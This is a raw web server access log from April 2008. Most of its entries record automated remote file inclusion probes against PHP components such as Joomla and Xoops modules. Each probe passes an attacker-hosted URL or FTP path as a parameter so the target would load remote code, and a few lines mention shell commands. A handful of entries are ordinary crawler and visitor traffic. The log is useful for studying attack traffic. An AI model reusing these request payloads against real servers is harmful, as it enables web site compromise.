202.29.32.2 - - [10/Apr/2008:09:50:45 -0700] "GET //index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
62.112.193.46 - - [10/Apr/2008:09:51:54 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.203.76.10 - - [10/Apr/2008:09:52:04 -0700] "GET /logs/access_080118.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.stickypen.com//modules/xfsection/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:52:29 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:52:30 -0700] "GET //index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:09:52:41 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:09:52:41 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:09:53:36 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [10/Apr/2008:09:53:36 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.46.131.186 - - [10/Apr/2008:09:54:04 -0700] "GET /logs/access_071225.log//zeroboard//skin/zero_vote/error.php?dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.46.131.186 - - [10/Apr/2008:09:54:05 -0700] "GET /logs//zeroboard//skin/zero_vote/error.php?dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.154.38.121 - - [10/Apr/2008:09:54:06 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [10/Apr/2008:09:54:06 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [10/Apr/2008:09:54:07 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.46.131.186 - - [10/Apr/2008:09:54:09 -0700] "GET /logs/access_071225.log//zeroboard//skin/zero_vote/error.php?dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.46.131.186 - - [10/Apr/2008:09:54:09 -0700] "GET /logs//zeroboard//skin/zero_vote/error.php?dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.46.131.186 - - [10/Apr/2008:09:54:15 -0700] "GET /logs/access_071225.log//zeroboard//skin/zero_vote/error.php?dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.46.131.186 - - [10/Apr/2008:09:54:15 -0700] "GET /logs//zeroboard//skin/zero_vote/error.php?dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.175.248.213 - - [10/Apr/2008:09:54:40 -0700] "GET //Neos_Chronos/header.php?base_folder=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
83.175.248.213 - - [10/Apr/2008:09:54:46 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
80.92.69.70 - - [10/Apr/2008:09:54:58 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.45.142 - - [10/Apr/2008:09:55:00 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.67.120.48 - - [10/Apr/2008:09:55:01 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.42.221 - - [10/Apr/2008:09:55:02 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.46.131.186 - - [10/Apr/2008:09:55:10 -0700] "GET /logs/access_080211.log//zeroboard//skin/zero_vote/error.php?dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.46.131.186 - - [10/Apr/2008:09:55:11 -0700] "GET /logs/access_080211.log//zeroboard//skin/zero_vote/error.php?dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.46.131.186 - - [10/Apr/2008:09:55:11 -0700] "GET /logs/access_080211.log//zeroboard//skin/zero_vote/error.php?dir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.154.38.121 - - [10/Apr/2008:09:55:16 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.216.120.163 - - [10/Apr/2008:09:55:32 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:56:28 -0700] "GET /logs/access_080131.log//index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:56:30 -0700] "GET //index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:09:56:32 -0700] "GET /logs//index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.207.204.13 - - [10/Apr/2008:09:56:34 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://it.geocities.com/biglionp0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.147.66 - - [10/Apr/2008:09:56:38 -0700] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.207.204.13 - - [10/Apr/2008:09:56:59 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://it.geocities.com/biglionp0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [10/Apr/2008:09:56:59 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://it.geocities.com/biglionp0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [10/Apr/2008:09:56:59 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://it.geocities.com/biglionp0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.147.66 - - [10/Apr/2008:09:57:05 -0700] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.207.204.13 - - [10/Apr/2008:09:57:21 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://it.geocities.com/biglionp0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:57:31 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:09:57:34 -0700] "GET //index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
64.38.199.175 - - [10/Apr/2008:09:58:41 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.199.175 - - [10/Apr/2008:09:58:41 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.199.175 - - [10/Apr/2008:09:58:42 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.37.167 - - [10/Apr/2008:09:58:59 -0700] "GET /logs/access.log HTTP/1.0" 200 134633 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.213.30 - - [10/Apr/2008:09:59:15 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [10/Apr/2008:09:59:16 -0700] "GET /megumi/Necklace/ HTTP/1.0" 200 4307 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
64.38.199.175 - - [10/Apr/2008:09:59:24 -0700] "GET /logs/access_080123.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.16.16.208 - - [10/Apr/2008:10:01:07 -0700] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:10:01:20 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:10:01:20 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:10:01:20 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.16.181 - - [10/Apr/2008:10:01:26 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.heimkinopage.de/members/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
81.177.16.181 - - [10/Apr/2008:10:01:26 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.heimkinopage.de/members/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
59.148.232.5 - - [10/Apr/2008:10:01:27 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://www.stickypen.com//modules/xfsection/klenk.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:10:03:28 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:10:03:28 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:10:03:28 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.173.70 - - [10/Apr/2008:10:03:37 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://frenchcoast.org/tikiwiki/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.173.70 - - [10/Apr/2008:10:03:37 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.semiahmoodle.net/wiki/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.92.68.121 - - [10/Apr/2008:10:03:47 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
85.92.68.121 - - [10/Apr/2008:10:03:47 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
59.148.232.5 - - [10/Apr/2008:10:03:49 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.stickypen.com//modules/xfsection/klenk.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:10:03:51 -0700] "GET /logs/access_080118.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.stickypen.com//modules/xfsection/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.194.212 - - [10/Apr/2008:10:04:07 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.194.212 - - [10/Apr/2008:10:04:07 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:10:05:08 -0700] "GET /logs/access_080118.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.16.198.208 - - [10/Apr/2008:10:06:31 -0700] "GET /logs/access_080130.log//admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://www.stickypen.com//modules/xfsection/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.1.62.200 - - [10/Apr/2008:10:06:38 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.archfuck.ru/administrator/components/com_remository/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.232.41.148 - - [10/Apr/2008:10:07:00 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.216.120.163 - - [10/Apr/2008:10:08:33 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.216.120.163 - - [10/Apr/2008:10:08:33 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.216.120.163 - - [10/Apr/2008:10:08:59 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.254.60.4 - - [10/Apr/2008:10:09:06 -0700] "GET /logs/index.php?get=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
200.254.60.4 - - [10/Apr/2008:10:09:08 -0700] "GET /index.php?get=http://m4r0c.com/rfi-scan/test.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:10:09:26 -0700] "GET /logs/access_080324.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:10:09:26 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:10:09:26 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.216.120.163 - - [10/Apr/2008:10:10:02 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.216.120.163 - - [10/Apr/2008:10:10:03 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [10/Apr/2008:10:10:05 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://it.geocities.com/biglionp0wa/blpid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:10:10:22 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:10:10:26 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:10:10:28 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:10:10:28 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:10:10:49 -0700] "GET /logs/access_080308.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.226.79.133 - - [10/Apr/2008:10:11:03 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[Shell]http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.58.254.89 - - [10/Apr/2008:10:11:23 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
211.58.254.89 - - [10/Apr/2008:10:11:24 -0700] "GET //index.php?option=com_custompages&cpage=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:10:11:38 -0700] "GET /logs/access_080131.log//index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.34.194.212 - - [10/Apr/2008:10:11:40 -0700] "GET /logs/access_080219.log//newspublish/include.php?path%5Bdocroot%5D=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:10:11:43 -0700] "GET //index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
66.230.212.199 - - [10/Apr/2008:10:11:45 -0700] "GET /logs/access_080219.log//newspublish/include.php?path%5Bdocroot%5D=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.21.48.203 - - [10/Apr/2008:10:11:47 -0700] "GET /logs//index.php?pagina=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.216.120.163 - - [10/Apr/2008:10:13:05 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:10:13:06 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:10:13:07 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:10:13:07 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.5.1 - - [10/Apr/2008:10:13:15 -0700] "GET //modules/xoopsgallery/init.php?GALLERY_BASEDIR=http://csinfo.pl/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:10:13:24 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:10:13:25 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.29.32.2 - - [10/Apr/2008:10:13:25 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.scs07.com/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:10:13:35 -0700] "GET /logs/access_080308.log/senetman/html/index.php?page=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:10:13:36 -0700] "GET /senetman/html/index.php?page=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
163.23.39.129 - - [10/Apr/2008:10:13:36 -0700] "GET /logs/senetman/html/index.php?page=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.40.45.130 - - [10/Apr/2008:10:13:54 -0700] "GET /logs/access_080219.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:10:15:01 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:10:15:01 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:10:15:02 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.10.60.39 - - [10/Apr/2008:10:15:09 -0700] "GET / HTTP/1.1" 200 7367 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
87.10.60.39 - - [10/Apr/2008:10:15:13 -0700] "GET /blog/index.php/2008/04/03/hello-world/ HTTP/1.1" 200 7090 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "dmulk.com"
87.10.60.39 - - [10/Apr/2008:10:15:16 -0700] "GET /blog/index.php/2008/04/03/hello-world/feed/ HTTP/1.1" 200 911 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)" "dmulk.com"
